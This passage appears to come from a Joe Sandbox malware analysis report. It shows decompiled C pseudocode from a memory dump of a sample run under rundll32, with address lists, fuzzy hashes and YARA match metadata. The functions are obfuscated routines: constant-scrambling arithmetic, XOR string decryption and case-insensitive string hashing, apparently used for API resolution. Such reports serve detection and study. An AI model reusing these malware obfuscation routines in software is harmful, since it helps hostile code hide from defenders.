					E007A3DBC( &_v44, _a8, _v72, _v48, _v52);
					_t112 = _t112 + 0xc;
					_t96 = 0xa9da54a;
					L11:
					__eflags = _t96 - 0x309e957;
				} while (__eflags != 0);
				goto L6;
			}

0x007a8b44
0x007a8b48
0x007a8b4a
0x007a8b4e
0x007a8b52
0x007a8b56
0x007a8b57
0x007a8b58
0x007a8b5d
0x007a8b65
0x007a8b68
0x007a8b6f
0x007a8b77
0x007a8b79
0x007a8b81
0x007a8b86
0x007a8b93
0x007a8b9b
0x007a8ba3
0x007a8bab
0x007a8bb3
0x007a8bbb
0x007a8bc3
0x007a8bc8
0x007a8bd0
0x007a8bd8
0x007a8be0
0x007a8be8
0x007a8bf0
0x007a8bf8
0x007a8bfd
0x007a8c05
0x007a8c0d
0x007a8c15
0x007a8c1d
0x007a8c25
0x007a8c2d
0x007a8c35
0x007a8c3a
0x007a8c42
0x007a8c4a
0x007a8c52
0x007a8c5d
0x007a8c65
0x007a8c69
0x007a8c6e
0x007a8c76
0x007a8c76
0x007a8c80
0x007a8ce0
0x00000000
0x007a8c82
0x007a8c88
0x007a8cd0
0x007a8cd5
0x007a8cd8
0x007a8cda
0x007a8cdc
0x00000000
0x007a8cdc
0x007a8c8a
0x007a8c8a
0x007a8c8c
0x00000000
0x007a8c8e
0x007a8ca2
0x007a8caf
0x007a8caf
0x007a8c8c
0x007a8c88
0x007a8cb3
0x007a8cbb
0x007a8cbb
0x007a8cf8
0x007a8cfd
0x007a8d00
0x007a8d05
0x007a8d05
0x007a8d05
0x00000000

Strings

7RX, xrefs: 007A8B9B

Memory Dump Source

Source File: 00000009.00000002.497023590.00000000007A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000009.00000002.497015544.00000000007A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.497057228.00000000007C3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 7RX
API String ID: 0-861457431
Opcode ID: 22ac0985efce6a924f31ebd31ed7415f32b1f56f57cf5f3da1b1feb7b99d064e
Instruction ID: 522b32a4e7e8ae13f17a90699e4fa61b67c7a3e100ef365f6e6aee8161ff0e49
Opcode Fuzzy Hash: 22ac0985efce6a924f31ebd31ed7415f32b1f56f57cf5f3da1b1feb7b99d064e
Instruction Fuzzy Hash: 83419571109301DBCB94CE21C48982FBBE1FBC5B98F100A2DF59692220D775CA19CF97

Uniqueness

Uniqueness Score: -1.00%

Function 007B7BA6 Relevance: 1.3, Strings: 1, Instructions: 97
COMMONCrypto

Download Yara Rule

C-Code - Quality: 89%

			E007B7BA6(signed int* __ecx, void* __edx, void* __eflags, intOrPtr _a4, signed int _a8) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* _t53;
				signed int _t60;
				signed int _t67;
				unsigned int _t71;
				signed int _t74;
				signed int _t76;
				signed int _t77;
				void* _t85;
				signed int _t92;
				void* _t98;
				intOrPtr _t99;
				signed int* _t100;
				signed int* _t101;
				signed int* _t102;

				_t100 = _a8;
				_t102 = __ecx;
				_push(_t100);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E007B20B9(_t53);
				_v12 = 0x7b3704;
				_t99 = 0;
				_v8 = 0x80915f;
				_v4 = 0;
				_v24 = 0xa71362;
				_v24 = _v24 << 0xb;
				_v24 = _v24 + 0x3e5;
				_v24 = _v24 ^ 0x3895df4e;
				_v28 = 0xc4b4e;
				_t76 = 0x2f;
				_v28 = _v28 * 0x14;
				_v28 = _v28 | 0x55175d82;
				_v28 = _v28 ^ 0x65144985;
				_v28 = _v28 ^ 0x30e15ded;
				_a8 = 0x3b45b7;
				_a8 = _a8 / _t76;
				_a8 = _a8 << 4;
				_t77 = 0x6c;
				_a8 = _a8 / _t77;
				_a8 = _a8 ^ 0x000cc8ea;
				_t60 =  *_t100;
				_t101 =  &(_t100[2]);
				_t92 = _t100[1] ^ _t60;
				_v20 = _t60;
				_v16 = _t92;
				_t71 =  !=  ? (_t92 & 0xfffffffc) + 4 : _t92;
				_t67 = E007A7FF2(_t71);
				_a8 = _t67;
				if(_t67 != 0) {
					_t98 =  >  ? 0 :  &(_t101[_t71 >> 2]) - _t101 + 3 >> 2;
					if(_t98 != 0) {
						_t74 = _v20;
						_t85 = _t67 - _t101;
						do {
							_t99 = _t99 + 1;
							 *(_t85 + _t101) =  *_t101 ^ _t74;
							_t101 =  &(_t101[1]);
						} while (_t99 < _t98);
						_t67 = _a8;
					}
					if(_t102 != 0) {
						 *_t102 = _v16;
						return _t67;
					}
				}
				return _t67;
			}

0x007b7bac
0x007b7bb0
0x007b7bb3
0x007b7bb4
0x007b7bb8
0x007b7bb9
0x007b7bba
0x007b7bbf
0x007b7bc7
0x007b7bc9
0x007b7bd3
0x007b7bd7
0x007b7bdf
0x007b7be4
0x007b7bec
0x007b7bf4
0x007b7c03
0x007b7c06
0x007b7c0a
0x007b7c12
0x007b7c1a
0x007b7c22
0x007b7c32
0x007b7c36
0x007b7c3f
0x007b7c42
0x007b7c46
0x007b7c4e
0x007b7c53
0x007b7c56
0x007b7c58
0x007b7c5e
0x007b7c6f
0x007b7c83
0x007b7c88
0x007b7c90
0x007b7ca6
0x007b7cab
0x007b7cad
0x007b7cb3
0x007b7cb5
0x007b7cb9
0x007b7cba
0x007b7cbd
0x007b7cc0
0x007b7cc4
0x007b7cc4
0x007b7cca
0x007b7cd0
0x00000000
0x007b7cd0
0x007b7cca
0x007b7cda

Strings

]0, xrefs: 007B7C1A

Memory Dump Source

Source File: 00000009.00000002.497023590.00000000007A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000009.00000002.497015544.00000000007A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.497057228.00000000007C3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: ]0
API String ID: 0-3096761382
Opcode ID: f410119f50637a55b7532a698d6b681cf897767909917c4c835d32da9b826f29
Instruction ID: 4a34a877e4c5234922d982ac75afe5ad07a6836ecebc64cb2b2e60db176687e9
Opcode Fuzzy Hash: f410119f50637a55b7532a698d6b681cf897767909917c4c835d32da9b826f29
Instruction Fuzzy Hash: 743178716093008FD318CF29C885A4BFBE5EBC9708F108A2DF58993251D775D905CB56

Uniqueness

Uniqueness Score: -1.00%

Function 007A3C3C Relevance: 1.3, Strings: 1, Instructions: 94
COMMONCrypto

Download Yara Rule

C-Code - Quality: 83%

			E007A3C3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				char _v564;
				void* _t97;
				signed int _t114;
				signed int _t115;
				signed int _t116;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E007B20B9(_t97);
				_v32 = 0xf161c0;
				_v32 = _v32 + 0xffff8ad4;
				_v32 = _v32 ^ 0x00fbd9a3;
				_v28 = 0xfc9039;
				_t114 = 0x1b;
				_v28 = _v28 / _t114;
				_t115 = 5;
				_v28 = _v28 * 0x6e;
				_v28 = _v28 ^ 0x040e4771;
				_v44 = 0x2ba482;
				_v44 = _v44 | 0x0543644d;
				_v44 = _v44 ^ 0x0568ae00;
				_v36 = 0xddb19;
				_t116 = 0x23;
				_v36 = _v36 / _t115;
				_v36 = _v36 ^ 0x000396ce;
				_v8 = 0xc420c0;
				_v8 = _v8 >> 8;
				_v8 = _v8 + 0xffff6316;
				_v8 = _v8 * 0x7a;
				_v8 = _v8 ^ 0x001ea2c5;
				_v12 = 0xb92025;
				_v12 = _v12 >> 3;
				_v12 = _v12 + 0xfe32;
				_v12 = _v12 << 0xe;
				_v12 = _v12 ^ 0x088e8322;
				_v24 = 0x144a1a;
				_v24 = _v24 + 0xffffa246;
				_v24 = _v24 + 0xffff01e3;
				_v24 = _v24 ^ 0x001122d6;
				_v16 = 0x7d3361;
				_v16 = _v16 / _t116;
				_v16 = _v16 << 4;
				_v16 = _v16 >> 9;
				_v16 = _v16 ^ 0x00004840;
				_v20 = 0xb3d6e6;
				_v20 = _v20 ^ 0x61ac6c83;
				_v20 = _v20 ^ 0xeb92407c;
				_v20 = _v20 ^ 0x8a8fe9bf;
				_v40 = 0xbcf254;
				_v40 = _v40 << 0xc;
				_v40 = _v40 ^ 0xcf275652;
				_push(_v44);
				_push(_v28);
				E007AA918(_a4, _v40, _v36, _v8, E007BDCF7(_v32, 0x7a17c0, _v40), _v12,  &_v564);
				E007AA8B0(_v24, _t107, _v16);
				return E007B1F8A(_v20, _v40,  &_v564);
			}

0x007a3c46
0x007a3c49
0x007a3c4c
0x007a3c4f
0x007a3c50
0x007a3c51
0x007a3c56
0x007a3c5f
0x007a3c66
0x007a3c6d
0x007a3c79
0x007a3c7e
0x007a3c87
0x007a3c8a
0x007a3c8d
0x007a3c94
0x007a3c9b
0x007a3ca2
0x007a3ca9
0x007a3cb5
0x007a3cb6
0x007a3cbb
0x007a3cc2
0x007a3cc9
0x007a3ccd
0x007a3cd8
0x007a3cdb
0x007a3ce2
0x007a3ce9
0x007a3ced
0x007a3cf4
0x007a3cf8
0x007a3cff
0x007a3d06
0x007a3d0d
0x007a3d14
0x007a3d1b
0x007a3d2c
0x007a3d2f
0x007a3d33
0x007a3d37
0x007a3d3e
0x007a3d45
0x007a3d4c
0x007a3d53
0x007a3d5a
0x007a3d61
0x007a3d65
0x007a3d6c
0x007a3d6f
0x007a3d90
0x007a3d9d
0x007a3dbb

Strings

a3}, xrefs: 007A3D1B

Memory Dump Source

Source File: 00000009.00000002.497023590.00000000007A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000009.00000002.497015544.00000000007A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.497057228.00000000007C3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: a3}
API String ID: 0-1821053108
Opcode ID: f7fe34829ff1a8db17c74a396089b163e761557799eeb387766578e0b358dfe0
Instruction ID: c59c2c776ea1b3f10913873a12d737cd385d7203ac6884e1731e7366bb49cfc1
Opcode Fuzzy Hash: f7fe34829ff1a8db17c74a396089b163e761557799eeb387766578e0b358dfe0
Instruction Fuzzy Hash: 42410171D0020AEBCF09CFE0D94A5EEBBB2FB44314F208159E510B6260D7B95B55DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 007B8606 Relevance: 1.3, Strings: 1, Instructions: 90
COMMONCrypto

Download Yara Rule

C-Code - Quality: 89%

			E007B8606(void* __ecx, signed int* __edx, void* __eflags) {
				void* _t46;
				signed int _t50;
				unsigned int* _t63;
				signed int _t64;
				signed int _t66;
				signed int _t72;
				unsigned int _t73;
				unsigned int _t74;
				unsigned int* _t78;
				signed int* _t79;
				signed int* _t80;
				unsigned int _t82;
				void* _t88;
				void* _t90;
				void* _t92;
				void* _t93;

				_push( *(_t92 + 0x2c));
				_push( *(_t92 + 0x2c));
				_push( *(_t92 + 0x2c));
				_push(__edx);
				E007B20B9(_t46);
				 *(_t92 + 0x20) = 0xe2d3c4;
				_t79 =  &(__edx[1]);
				 *(_t92 + 0x20) =  *(_t92 + 0x20) + 0xa17d;
				 *(_t92 + 0x20) =  *(_t92 + 0x20) << 0x10;
				 *(_t92 + 0x20) =  *(_t92 + 0x20) ^ 0xc7a816b6;
				 *(_t92 + 0x20) =  *(_t92 + 0x20) ^ 0xb2e477eb;
				 *(_t92 + 0x28) = 0xf8496b;
				 *(_t92 + 0x28) =  *(_t92 + 0x28) >> 0xa;
				 *(_t92 + 0x28) =  *(_t92 + 0x28) * 0x37;
				 *(_t92 + 0x28) =  *(_t92 + 0x28) ^ 0x0006b61c;
				 *(_t92 + 0x24) = 0x2326e4;
				 *(_t92 + 0x24) =  *(_t92 + 0x24) | 0x0bc2d168;
				 *(_t92 + 0x24) =  *(_t92 + 0x24) << 4;
				 *(_t92 + 0x24) =  *(_t92 + 0x24) ^ 0xbe3c76f1;
				_t66 =  *__edx;
				_t80 =  &(_t79[1]);
				_t50 =  *_t79 ^ _t66;
				 *(_t92 + 0x2c) = _t66;
				 *(_t92 + 0x30) = _t50;
				_t30 = _t50 + 1; // 0xb
				_t82 =  !=  ? (_t30 & 0xfffffffc) + 4 : _t30;
				_t93 = _t92 + 0xc;
				_t63 = E007A7FF2(_t82);
				 *(_t93 + 0x1c) = _t63;
				if(_t63 != 0) {
					_t90 = 0;
					_t78 = _t63;
					_t88 =  >  ? 0 :  &(_t80[_t82 >> 2]) - _t80 + 3 >> 2;
					if(_t88 != 0) {
						_t64 =  *(_t93 + 0x1c);
						do {
							_t72 =  *_t80;
							_t80 =  &(_t80[1]);
							_t73 = _t72 ^ _t64;
							 *_t78 = _t73;
							_t78 =  &(_t78[1]);
							_t74 = _t73 >> 0x10;
							 *((char*)(_t78 - 3)) = _t73 >> 8;
							 *(_t78 - 2) = _t74;
							_t90 = _t90 + 1;
							 *((char*)(_t78 - 1)) = _t74 >> 8;
						} while (_t90 < _t88);
						_t63 =  *(_t93 + 0x18);
					}
					 *((char*)(_t63 +  *((intOrPtr*)(_t93 + 0x20)))) = 0;
				}
				return _t63;
			}

0x007b860c
0x007b8610
0x007b8614
0x007b8618
0x007b861a
0x007b861f
0x007b8627
0x007b862a
0x007b8632
0x007b8637
0x007b863f
0x007b8647
0x007b864f
0x007b8659
0x007b865d
0x007b8665
0x007b866d
0x007b8675
0x007b867a
0x007b8682
0x007b8686
0x007b8689
0x007b868b
0x007b868f
0x007b8693
0x007b86a3
0x007b86ae
0x007b86bc
0x007b86be
0x007b86c6
0x007b86ce
0x007b86d0
0x007b86e1
0x007b86e6
0x007b86e8
0x007b86ec
0x007b86ec
0x007b86ee
0x007b86f1
0x007b86f3
0x007b86fa
0x007b86fd
0x007b8700
0x007b8703
0x007b8709
0x007b870a
0x007b870d
0x007b8711
0x007b8711
0x007b871a
0x007b871a
0x007b8726

Strings

&#, xrefs: 007B8665

Memory Dump Source

Source File: 00000009.00000002.497023590.00000000007A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000009.00000002.497015544.00000000007A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.497057228.00000000007C3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: &#
API String ID: 0-2240308938
Opcode ID: 7b9ad6a671dc95800b82af0f3d55b183cd0e6387ee121b23275acf08ce764799
Instruction ID: 630c94220ee4300ea0ec6f9f0e16aed57a5ec128dd042a71499805b15bc8df7f
Opcode Fuzzy Hash: 7b9ad6a671dc95800b82af0f3d55b183cd0e6387ee121b23275acf08ce764799
Instruction Fuzzy Hash: 50316D726083518FC305DF28C88595BFBE0FF98718F054B6DE889A7211DB74EA09CB96

Uniqueness

Uniqueness Score: -1.00%

Function 007BDCF7 Relevance: 1.3, Strings: 1, Instructions: 90
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E007BDCF7(void* __ecx, signed int* __edx, void* __eflags) {
				void* _t39;
				signed int _t43;
				signed int _t60;
				signed int _t61;
				signed int _t63;
				signed int _t70;
				unsigned int _t71;
				unsigned int _t72;
				signed int _t76;
				signed int* _t77;
				signed int* _t78;
				unsigned int _t80;
				void* _t86;
				short _t88;
				void* _t90;
				void* _t91;

				_push( *(_t90 + 0x28));
				_push( *(_t90 + 0x28));
				_push(__edx);
				E007B20B9(_t39);
				 *(_t90 + 0x24) = 0xf19f37;
				_t77 =  &(__edx[1]);
				 *(_t90 + 0x24) =  *(_t90 + 0x24) * 0x42;
				 *(_t90 + 0x24) =  *(_t90 + 0x24) ^ 0x3e4cf98f;
				 *(_t90 + 0x20) = 0xb1a340;
				 *(_t90 + 0x20) =  *(_t90 + 0x20) + 0xbcd0;
				 *(_t90 + 0x20) =  *(_t90 + 0x20) ^ 0x00b2d2cb;
				 *(_t90 + 0x1c) = 0x9743e1;
				 *(_t90 + 0x1c) =  *(_t90 + 0x1c) | 0x457c67e3;
				 *(_t90 + 0x1c) =  *(_t90 + 0x1c) ^ 0x45f711d7;
				_t63 =  *__edx;
				_t78 =  &(_t77[1]);
				_t43 =  *_t77 ^ _t63;
				 *(_t90 + 0x28) = _t63;
				 *(_t90 + 0x2c) = _t43;
				_t21 = _t43 + 1; // 0xf19f38
				_t80 =  !=  ? (_t21 & 0xfffffffc) + 4 : _t21;
				_t91 = _t90 + 8;
				_t60 = E007A7FF2(_t80 + _t80);
				 *(_t91 + 0x1c) = _t60;
				if(_t60 != 0) {
					_t88 = 0;
					_t76 = _t60;
					_t86 =  >  ? 0 :  &(_t78[_t80 >> 2]) - _t78 + 3 >> 2;
					if(_t86 != 0) {
						_t61 =  *(_t91 + 0x1c);
						do {
							_t70 =  *_t78;
							_t78 =  &(_t78[1]);
							_t71 = _t70 ^ _t61;
							 *_t76 = _t71 & 0x000000ff;
							_t76 = _t76 + 8;
							 *((short*)(_t76 - 6)) = _t71 >> 0x00000008 & 0x000000ff;
							_t72 = _t71 >> 0x10;
							_t88 = _t88 + 1;
							 *((short*)(_t76 - 4)) = _t72 & 0x000000ff;
							 *((short*)(_t76 - 2)) = _t72 >> 0x00000008 & 0x000000ff;
						} while (_t88 < _t86);
						_t60 =  *(_t91 + 0x18);
					}
					 *((short*)(_t60 +  *(_t91 + 0x20) * 2)) = 0;
				}
				return _t60;
			}

0x007bdcfd
0x007bdd01
0x007bdd05
0x007bdd07
0x007bdd0c
0x007bdd14
0x007bdd1c
0x007bdd20
0x007bdd28
0x007bdd30
0x007bdd38
0x007bdd40
0x007bdd48
0x007bdd50
0x007bdd58
0x007bdd5c
0x007bdd5f
0x007bdd61
0x007bdd65
0x007bdd69
0x007bdd79
0x007bdd84
0x007bdd93
0x007bdd95
0x007bdd9d
0x007bdda5
0x007bdda7
0x007bddb8
0x007bddbd
0x007bddbf
0x007bddc3
0x007bddc3
0x007bddc5
0x007bddc8
0x007bddcd
0x007bddd5
0x007bdddb
0x007bdddf
0x007bdde8
0x007bdde9
0x007bddf0
0x007bddf4
0x007bddf8
0x007bddf8
0x007bde03
0x007bde03
0x007bde0f

Strings

g|E, xrefs: 007BDD48

Memory Dump Source

Source File: 00000009.00000002.497023590.00000000007A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000009.00000002.497015544.00000000007A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.497057228.00000000007C3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: g|E
API String ID: 0-3824901942
Opcode ID: 434da03f0d83d3a5d6d93c32cdb42b6ac713b1fcc8cbc1b08d0d3376fbdc5032
Instruction ID: 7ad05007d28b9cb0d2c773fa7cd1765358bad9c9658ae695ad84a2c861ff9a89
Opcode Fuzzy Hash: 434da03f0d83d3a5d6d93c32cdb42b6ac713b1fcc8cbc1b08d0d3376fbdc5032
Instruction Fuzzy Hash: AD3190766083118FC314DF29C48546BF7E0FF88318F414B6EE889AB251E774EA09CB96

Uniqueness

Uniqueness Score: -1.00%

Function 007A51BB Relevance: 1.3, Strings: 1, Instructions: 81
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E007A51BB() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				void* _t72;
				intOrPtr _t83;
				signed int _t87;
				signed int _t88;
				signed int _t89;

				_v28 = _v28 & 0x00000000;
				_v32 = 0x54cf7d;
				_v16 = 0x3835ff;
				_v16 = _v16 >> 0xa;
				_v16 = _v16 * 0x17;
				_v16 = _v16 ^ 0x00095bb8;
				_t72 = 0xe98fb1d;
				_v24 = 0x583681;
				_t87 = 0x44;
				_v24 = _v24 / _t87;
				_v24 = _v24 ^ 0x000eb9f7;
				_v12 = 0x832b1f;
				_v12 = _v12 << 5;
				_v12 = _v12 | 0x242a8544;
				_v12 = _v12 ^ 0x346a2866;
				_v8 = 0x6a77bb;
				_v8 = _v8 >> 0xe;
				_t88 = 0x19;
				_v8 = _v8 / _t88;
				_v8 = _v8 ^ 0x9d9369f0;
				_v8 = _v8 ^ 0x9d908f3a;
				_v20 = 0x4802c8;
				_t89 = 0x21;
				_v20 = _v20 / _t89;
				_v20 = _v20 + 0xffffbfc3;
				_v20 = _v20 ^ 0x000df493;
				do {
					while(_t72 != 0x9835b86) {
						if(_t72 == 0xe98fb1d) {
							_push(_t72);
							_push(_t72);
							 *0x7c3e04 = E007A7FF2(0x134);
							_t72 = 0x9835b86;
							continue;
						}
						goto L5;
					}
					_t83 =  *0x7c3e04; // 0x0
					E007B0001(_v8, _t83 + 0x18, _v20);
					_t72 = 0x7dce4e4;
					L5:
				} while (_t72 != 0x7dce4e4);
				return 1;
			}

0x007a51c1
0x007a51c7
0x007a51ce
0x007a51d5
0x007a51e2
0x007a51ea
0x007a51f1
0x007a51f3
0x007a5202
0x007a5207
0x007a520c
0x007a5213
0x007a521a
0x007a521e
0x007a5225
0x007a522c
0x007a5233
0x007a523a
0x007a523f
0x007a5244
0x007a524b
0x007a5252
0x007a525c
0x007a5264
0x007a5267
0x007a526e
0x007a5275
0x007a5275
0x007a527b
0x007a528b
0x007a528c
0x007a5294
0x007a5299
0x00000000
0x007a5299
0x00000000
0x007a527b
0x007a52a0
0x007a52ac
0x007a52b2
0x007a52b4
0x007a52b4
0x007a52c1

Strings

f(j4, xrefs: 007A5225

Memory Dump Source

Source File: 00000009.00000002.497023590.00000000007A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000009.00000002.497015544.00000000007A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.497057228.00000000007C3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: f(j4
API String ID: 0-3086030595
Opcode ID: 67983f5c4079c3b42486104aafeb209e1e5a4c6b127b5e70fa215f9bc30eaa17
Instruction ID: e53aa7ee1727d1ed5f6ca5efafb5e28f8d49ea7ca47251ebf9a0f10b9f171d1b
Opcode Fuzzy Hash: 67983f5c4079c3b42486104aafeb209e1e5a4c6b127b5e70fa215f9bc30eaa17
Instruction Fuzzy Hash: EB314B71E01219EBCF08DFAAD9455EEBBB1FB84324F208199E505AB250D3B85F45CF80

Uniqueness

Uniqueness Score: -1.00%

Function 007A2051 Relevance: 1.3, Strings: 1, Instructions: 80
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E007A2051(void* __edx, signed int _a4, intOrPtr _a8) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				void* _t71;
				signed int _t78;
				signed int _t80;
				signed int _t83;
				signed int _t92;
				signed int _t95;
				signed short* _t97;

				_push(_a8);
				_t97 = _a4;
				_push(_t97);
				E007B20B9(_t71);
				_v16 = 0x71ca23;
				_v12 = 0x57f692;
				_v8 = 0;
				_v4 = 0;
				_v20 = 0xd3252c;
				_v20 = _v20 + 0x4351;
				_v20 = _v20 + 0xffff5b79;
				_v20 = _v20 ^ 0x00d2c3f6;
				_a4 = 0xbb067e;
				_t83 = 0x11;
				_a4 = _a4 / _t83;
				_a4 = _a4 >> 8;
				_a4 = _a4 ^ 0xac5d3832;
				_a4 = _a4 ^ 0xac5d3334;
				_a4 = 0xab60c2;
				_a4 = _a4 << 0x10;
				_a4 = _a4 ^ 0x910d5570;
				_a4 = _a4 >> 4;
				_a4 = _a4 ^ 0x0f1cf547;
				if( *_t97 != 0) {
					do {
						_t80 = _v20;
						_a4 = 0xbb067e;
						_a4 = _a4 / _t83;
						_a4 = _a4 >> 8;
						_a4 = _a4 ^ 0xac5d3832;
						_a4 = _a4 ^ 0xac5d3334;
						_a4 = 0xab60c2;
						_a4 = _a4 << 0x10;
						_a4 = _a4 ^ 0x910d5570;
						_a4 = _a4 >> 4;
						_a4 = _a4 ^ 0x0f1cf547;
						_t92 = _v20 << _a4;
						_t78 =  *_t97 & 0x0000ffff;
						_t95 = _v20 << _a4;
						if(_t78 >= 0x41 && _t78 <= 0x5a) {
							_t78 = _t78 + 0x20;
						}
						_v20 = _t78;
						_t97 =  &(_t97[1]);
						_v20 = _v20 + _t92;
						_v20 = _v20 + _t95;
						_v20 = _v20 - _t80;
						_t83 = 0x11;
					} while ( *_t97 != 0);
				}
				return _v20;
			}

0x007a2056
0x007a205a
0x007a205e
0x007a2061
0x007a2066
0x007a2070
0x007a207b
0x007a2081
0x007a2085
0x007a208d
0x007a2095
0x007a209d
0x007a20a5
0x007a20b3
0x007a20b6
0x007a20ba
0x007a20bf
0x007a20c7
0x007a20cf
0x007a20d7
0x007a20dc
0x007a20e4
0x007a20e9
0x007a20f4
0x007a20fc
0x007a20fc
0x007a2102
0x007a2110
0x007a2114
0x007a2119
0x007a2121
0x007a2131
0x007a2139
0x007a213e
0x007a2146
0x007a214b
0x007a2153
0x007a215d
0x007a2160
0x007a2165
0x007a216c
0x007a216c
0x007a216f
0x007a2173
0x007a2176
0x007a217a
0x007a217e
0x007a2184
0x007a2185
0x007a218f
0x007a2199

Strings

QC, xrefs: 007A208D

Memory Dump Source

Source File: 00000009.00000002.497023590.00000000007A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000009.00000002.497015544.00000000007A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.497057228.00000000007C3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: QC
API String ID: 0-229404352
Opcode ID: f90a2f0d9400246e94e52ce9e9c4602303884de4e781704f0e0226566f48be9f
Instruction ID: d0bbd0a10cafe01d11e2d273dfb30e8be161946b9e64a0c9a5ed489f4d079eac
Opcode Fuzzy Hash: f90a2f0d9400246e94e52ce9e9c4602303884de4e781704f0e0226566f48be9f
Instruction Fuzzy Hash: 5B3117715083818BD315DF29C48905BBBE0FFC87A8F548E1DF4C9A2225D3B4C689CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 007B176B Relevance: 1.3, Strings: 1, Instructions: 75
COMMONCrypto

Download Yara Rule

C-Code - Quality: 88%

			E007B176B(void* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _t87;
				signed int _t91;
				signed int _t92;
				signed int _t93;
				void* _t102;
				signed int _t103;

				_v36 = _v36 & 0x00000000;
				_v40 = 0x355323;
				_v24 = 0x6eb9b5;
				_v24 = _v24 + 0x6c21;
				_t102 = __ecx;
				_t91 = 0x64;
				_v24 = _v24 / _t91;
				_v24 = _v24 ^ 0x0005c519;
				_v32 = 0xba69a0;
				_v32 = _v32 << 7;
				_v32 = _v32 ^ 0x5d3c95d0;
				_v20 = 0x99612d;
				_v20 = _v20 | 0x6bf7bfaf;
				_v20 = _v20 + 0x66ac;
				_v20 = _v20 ^ 0x6c036c89;
				_v16 = 0xd72900;
				_v16 = _v16 + 0xffff2462;
				_v16 = _v16 ^ 0xa7b97bfd;
				_v16 = _v16 + 0xffff7578;
				_v16 = _v16 ^ 0xa76084ba;
				_v12 = 0xeb6610;
				_t92 = 0x6f;
				_v12 = _v12 / _t92;
				_v12 = _v12 << 0xf;
				_v12 = _v12 ^ 0x2e835447;
				_v12 = _v12 ^ 0x21f4cf0c;
				_v28 = 0x644f8d;
				_v28 = _v28 << 3;
				_v28 = _v28 << 0xa;
				_v28 = _v28 ^ 0x89f1a004;
				_v8 = 0xbb77ef;
				_t93 = 0x72;
				_v8 = _v8 * 0x3c;
				_v8 = _v8 / _t93;
				_v8 = _v8 << 6;
				_v8 = _v8 ^ 0x18aaba50;
				_t87 = E007B0AE0(_v8, _v28);
				_push(_v12);
				_t103 = _t87;
				_push(_t102);
				_push(_t103);
				_push(3);
				E007A80E3(_v20, _v16);
				 *((short*)(_t102 + _t103 * 2)) = 0;
				return 0;
			}

0x007b1771
0x007b1777
0x007b177e
0x007b1785
0x007b1793
0x007b1795
0x007b179a
0x007b179f
0x007b17a6
0x007b17ad
0x007b17b1
0x007b17b8
0x007b17bf
0x007b17c6
0x007b17cd
0x007b17d4
0x007b17db
0x007b17e2
0x007b17e9
0x007b17f0
0x007b17f7
0x007b1801
0x007b1806
0x007b180b
0x007b180f
0x007b1816
0x007b181d
0x007b1824
0x007b1828
0x007b182c
0x007b1833
0x007b183e
0x007b183f
0x007b1847
0x007b184a
0x007b184e
0x007b1861
0x007b1866
0x007b186c
0x007b1871
0x007b1872
0x007b1873
0x007b1875
0x007b187f
0x007b1888

Strings

#S5, xrefs: 007B1777

Memory Dump Source

